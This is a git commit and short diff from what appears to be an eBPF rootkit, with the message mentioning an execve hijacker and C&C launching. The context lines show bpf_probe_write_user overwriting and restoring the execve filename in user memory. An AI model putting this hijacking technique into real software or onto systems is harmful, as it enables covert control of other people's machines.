Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper

2025-12-22 09:43:07 +08:00 · 2022-02-19 11:57:32 -05:00
parent 8e97624326
commit 1ec4ed8486
12 changed files with 2072 additions and 2086 deletions
--- a/src/ebpf/include/bpf/exec.h
+++ b/src/ebpf/include/bpf/exec.h
@@ -77,7 +77,6 @@ static __always_inline int test_write_user_unique(struct sys_execve_enter_ctx *c
        bpf_probe_write_user((void*)(ctx->filename), (void*)org_filename, 1);
        return -1;
    }
-    bpf_printk("Char was %u\n", argv_c);
    //Everything went fine, but let's fix our modification anyways since the next write to user memory, which
    //implies more bytes, may fail.
    bpf_probe_write_user((void*)(ctx->filename), (void*)org_filename, 1);